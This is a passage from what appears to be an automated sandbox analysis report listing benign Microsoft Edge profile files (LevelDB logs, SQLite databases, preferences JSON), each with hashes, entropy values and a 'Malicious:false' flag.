                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):428
                                                                                                                                                                                                      Entropy (8bit):5.211218245340643
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:ZQ+vLZYebvqBZFUt8vGKW/+gQV54ZYebvqBaJ:Z5lYebvyg8vGK4SoYebvL
                                                                                                                                                                                                      MD5:1E3EDEADC39F6D8DB619BC25A2ED1484
                                                                                                                                                                                                      SHA1:C8D98CB695E977AB61E8942F52BE33BEE288BE44
                                                                                                                                                                                                      SHA-256:4144B73A3E2A3B822E61F7BC2072FCC3DA838348DDE2567D56AD347A1CE57E9C
                                                                                                                                                                                                      SHA-512:9DD05DD7433B64FA0CA67788680F6A0CB5B7ACE2425C7A66C179FA87D7EF32E43E4AC1F9C290834680161255FD79BCEE7DF69F5D96E1E1713EBE7D11084A85EC
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:35.305 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/04-07:53:35.306 1eec Recovering log #3.2024/12/04-07:53:35.309 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):334
                                                                                                                                                                                                      Entropy (8bit):5.261958342840296
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUHmyq2PcNwi23oH+TcwtpIFUt8mjYUHw1Zmw+mjYUHmRkwOcNwi23oH+Tcwt7:xHmyvLZYebmFUt8CHe/+CHmR54ZYebaQ
                                                                                                                                                                                                      MD5:368B04161B5606EA637925FBEE3F3500
                                                                                                                                                                                                      SHA1:3097059A459B4128E1382BD106C9766059E9A5A7
                                                                                                                                                                                                      SHA-256:1A7F471C12439CEFE5219EDA2F2814BF94C08BCC7D070141BE8C556642A4C73D
                                                                                                                                                                                                      SHA-512:9B93F4F7523FDC465800A68D5B3103A3280A6C14A1D4CF16E7017DBB8D696A1E92F1DC55D4BD56E944DC36F387DC5A5D847EE0A41226B7E4B22ABC3E8F31C232
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:16.858 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/04-07:53:16.858 1de4 Recovering log #3.2024/12/04-07:53:16.858 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):334
                                                                                                                                                                                                      Entropy (8bit):5.261958342840296
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUHmyq2PcNwi23oH+TcwtpIFUt8mjYUHw1Zmw+mjYUHmRkwOcNwi23oH+Tcwt7:xHmyvLZYebmFUt8CHe/+CHmR54ZYebaQ
                                                                                                                                                                                                      MD5:368B04161B5606EA637925FBEE3F3500
                                                                                                                                                                                                      SHA1:3097059A459B4128E1382BD106C9766059E9A5A7
                                                                                                                                                                                                      SHA-256:1A7F471C12439CEFE5219EDA2F2814BF94C08BCC7D070141BE8C556642A4C73D
                                                                                                                                                                                                      SHA-512:9B93F4F7523FDC465800A68D5B3103A3280A6C14A1D4CF16E7017DBB8D696A1E92F1DC55D4BD56E944DC36F387DC5A5D847EE0A41226B7E4B22ABC3E8F31C232
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:16.858 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/04-07:53:16.858 1de4 Recovering log #3.2024/12/04-07:53:16.858 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                                                      Entropy (8bit):0.0033616753448762224
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:ImtVuknYDitlF61Xll:IiVukYmO1
                                                                                                                                                                                                      MD5:9A86852F8991348EFBBCA2B4CB72B18E
                                                                                                                                                                                                      SHA1:AA1FD04287E3EED71D7CB697441B8A2E8A0D2F53
                                                                                                                                                                                                      SHA-256:02F4C5E40332DA556BBBFD464C97CEE3747683D51BD23AC6F5D66CE0B2C32301
                                                                                                                                                                                                      SHA-512:2153645E07759D8C17BC3D9B95458EBD5F8AB739755E47EAF02A0712CFC070CCC99C2473091FABF98FC8035852601ECE6494708D65D1CA21FE20E0A4351E17D9
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:VLnk.....?......[.}..'Z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                      Entropy (8bit):1.2653098268140925
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:384:KrJ/2qOB1nxCkMmSAELyKOMq+8HKkjucswRv8p3nVum5:K0q+n0Jm9ELyKOMq+8HKkjuczRv89t
                                                                                                                                                                                                      MD5:8C8F8F398B6B6AFA64EC96275F005A5A
                                                                                                                                                                                                      SHA1:E0B1E53A010424897D478734BA63E350E39F6E50
                                                                                                                                                                                                      SHA-256:379323CA0E2E67391E3E745E77B488C5C3003ACC36B68EEA0E606635DFECD569
                                                                                                                                                                                                      SHA-512:EDA432661F62F6F855FB8E2548486FEB845545378D3ABF4C1DD39F2D5701DC4DBC4BCC90F8E725D11216BAD526508E3FD2078021580E62433BF6FA0A83728D2D
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                      Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                      MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                      SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                      SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                      SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):11755
                                                                                                                                                                                                      Entropy (8bit):5.190465908239046
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                      MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                      SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                      SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                      SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9371
                                                                                                                                                                                                      Entropy (8bit):5.087048301326224
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZSzszhxyaNP9kj3q82bV+FiAxOOGPuYJ:stZksVxtJjbGiEOv
                                                                                                                                                                                                      MD5:13EB523A5CBE9CB951E132B5CDECBF5A
                                                                                                                                                                                                      SHA1:2D2A99366DDC1C951CEE0D08BE5668EE5ECC56C1
                                                                                                                                                                                                      SHA-256:A11FBC52D270F5EC5F5F783E489A45963BC853431B0B76B7657EC59C0021076F
                                                                                                                                                                                                      SHA-512:1D6E7356AD71F9CCD64DEE79117CD3EFB90524A58BF9AF3F67ECE58FBFC75FBB232DB4E8BFA2849D168D91160A5B5489E51178156EF633F0A62797E434D7B540
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dip
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                      Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                      MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                      SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                      SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                      SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):12903
                                                                                                                                                                                                      Entropy (8bit):5.275170460732623
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZJ99QTryDilbatSuyMszhxyaNP6vkj3q82bV+FiAJWOgRPuYJ:stZPGiSursVxtJ6pbGiAWOgN
                                                                                                                                                                                                      MD5:B9CC3114C1133E62DC4864C0D1B1AD71
                                                                                                                                                                                                      SHA1:837518FE2E1E467FA58C34B96CE1EBEFE2A18F46
                                                                                                                                                                                                      SHA-256:68EE53257930D9EB1EF6FB62BC65DDF184F870738BBC03A922ABE76859EA414E
                                                                                                                                                                                                      SHA-512:E8769084746C90FB20389CA8FE37BD301E753400EAECEB54AC1EA70DF4A7312AF321D3DAEECCA66CC6A3BFC9E0D0EB8F10F7E24B459F4E9479EDC2F736618A92
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                      Entropy (8bit):0.049471177452761014
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:Gd0VmH0VwL9XCChslotGLNl0ml/XoQDeX:zcUupEjVl/XoQ
                                                                                                                                                                                                      MD5:CCBB8ED12C0F486E5E19AB114740410D
                                                                                                                                                                                                      SHA1:E541F993884384BC7251CE679E7FCB32F1F99C8F
                                                                                                                                                                                                      SHA-256:F6AE64234C5FE01A8980DE33BCCF75ADA476CD96A81EC957E36ED2BF9B2902DD
                                                                                                                                                                                                      SHA-512:903859E0658DE0BED461EA047458F954CBF9A12D01D2FB078618A2DBFED023D8C0112078934C622B817560047E3F2F7A9751337F8D30EB28B37B9FA16939D591
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:..-.....................B..".q.43.-......~*.~v}..-.....................B..".q.43.-......~*.~v}........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):485
                                                                                                                                                                                                      Entropy (8bit):4.008496815056885
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuLillsOQz+AvlPsedhOCxs:llc8BOuuuuuuuuuuuWllsF+AvlU8Vxs
                                                                                                                                                                                                      MD5:46ABDEFCC156F976D7671F8C9B3F541D
                                                                                                                                                                                                      SHA1:469DF8C4266F5BB4900D8AAAC93B87AD20504634
                                                                                                                                                                                                      SHA-256:7826942C45B0E051F616DFC52B5EACD19E253CD4694FD239CA9E1ACA12B3ED20
                                                                                                                                                                                                      SHA-512:E00815F7DA01BA4859BDE56995198312490FDEAFDF0D7AFA03B25BC2FDC46E951CF3D71136ED358E07522964166A87C5D76191340FB3D9B73E9D7091E9113EF4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............sn..;...............#38_h.......6.Z..W.F.....`.......`............V.e................tQ..0................39_config..........6.....n ...1
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                      Entropy (8bit):5.241742867057573
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYU7QQL+q2PcNwi23oH+TcwtfrK+IFUt8mjYU7QG1Zmw+mjYU7QQLVkwOcNwi2R:xxyvLZYeb23FUt8C1/+CxR54ZYeb3J
                                                                                                                                                                                                      MD5:2D3E7DAA72ECF2DE713FC88506595CDC
                                                                                                                                                                                                      SHA1:71443C76824FB3E131D6A1FC803C0DFA9B9D4C1D
                                                                                                                                                                                                      SHA-256:F13C6E310441A8F241728574B1185CF99E06115942DC4F64D88D07775A96D929
                                                                                                                                                                                                      SHA-512:7F13EC285B1765B49169F80B5CFEB7A259848893A83967751D8A5BB105329C005C39FB808BD1F4B7195AE3E663783468E9173C9B08ED70410118D8C150E7E9BA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.348 1da8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/04-07:53:17.348 1da8 Recovering log #3.2024/12/04-07:53:17.348 1da8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                      Entropy (8bit):5.241742867057573
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYU7QQL+q2PcNwi23oH+TcwtfrK+IFUt8mjYU7QG1Zmw+mjYU7QQLVkwOcNwi2R:xxyvLZYeb23FUt8C1/+CxR54ZYeb3J
                                                                                                                                                                                                      MD5:2D3E7DAA72ECF2DE713FC88506595CDC
                                                                                                                                                                                                      SHA1:71443C76824FB3E131D6A1FC803C0DFA9B9D4C1D
                                                                                                                                                                                                      SHA-256:F13C6E310441A8F241728574B1185CF99E06115942DC4F64D88D07775A96D929
                                                                                                                                                                                                      SHA-512:7F13EC285B1765B49169F80B5CFEB7A259848893A83967751D8A5BB105329C005C39FB808BD1F4B7195AE3E663783468E9173C9B08ED70410118D8C150E7E9BA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.348 1da8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/04-07:53:17.348 1da8 Recovering log #3.2024/12/04-07:53:17.348 1da8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):782
                                                                                                                                                                                                      Entropy (8bit):4.049291162962452
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                      MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                      SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                      SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                      SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):348
                                                                                                                                                                                                      Entropy (8bit):5.209667248513958
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUcUydSQL+q2PcNwi23oH+TcwtfrzAdIFUt8mjYUBG1Zmw+mjYUlQLVkwOcNw0:xcUmyvLZYeb9FUt8Ce/+CKR54ZYeb2J
                                                                                                                                                                                                      MD5:A05385E36AFE1A0C063A1DD615CDE730
                                                                                                                                                                                                      SHA1:00FB1888CBF6D9C0F10FFC21432E7FE6D753F869
                                                                                                                                                                                                      SHA-256:D6E69AFDE89A3BDE58B4712F4CB941143E0E8717B0AA42C57F06E4AAFE1ECAF7
                                                                                                                                                                                                      SHA-512:52EB43BA834317CAC86A0180B2671CC0EC486A8917041ABF351174FB03984ACEE1EF59212745C325CEF13CC93C2FA4358413E98DDDF6501D5D6DEB66676EC378
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.307 1da8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/04-07:53:17.330 1da8 Recovering log #3.2024/12/04-07:53:17.345 1da8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):348
                                                                                                                                                                                                      Entropy (8bit):5.209667248513958
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUcUydSQL+q2PcNwi23oH+TcwtfrzAdIFUt8mjYUBG1Zmw+mjYUlQLVkwOcNw0:xcUmyvLZYeb9FUt8Ce/+CKR54ZYeb2J
                                                                                                                                                                                                      MD5:A05385E36AFE1A0C063A1DD615CDE730
                                                                                                                                                                                                      SHA1:00FB1888CBF6D9C0F10FFC21432E7FE6D753F869
                                                                                                                                                                                                      SHA-256:D6E69AFDE89A3BDE58B4712F4CB941143E0E8717B0AA42C57F06E4AAFE1ECAF7
                                                                                                                                                                                                      SHA-512:52EB43BA834317CAC86A0180B2671CC0EC486A8917041ABF351174FB03984ACEE1EF59212745C325CEF13CC93C2FA4358413E98DDDF6501D5D6DEB66676EC378
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.307 1da8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/04-07:53:17.330 1da8 Recovering log #3.2024/12/04-07:53:17.345 1da8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):120
                                                                                                                                                                                                      Entropy (8bit):3.32524464792714
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                      MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                      SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                      SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                      SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
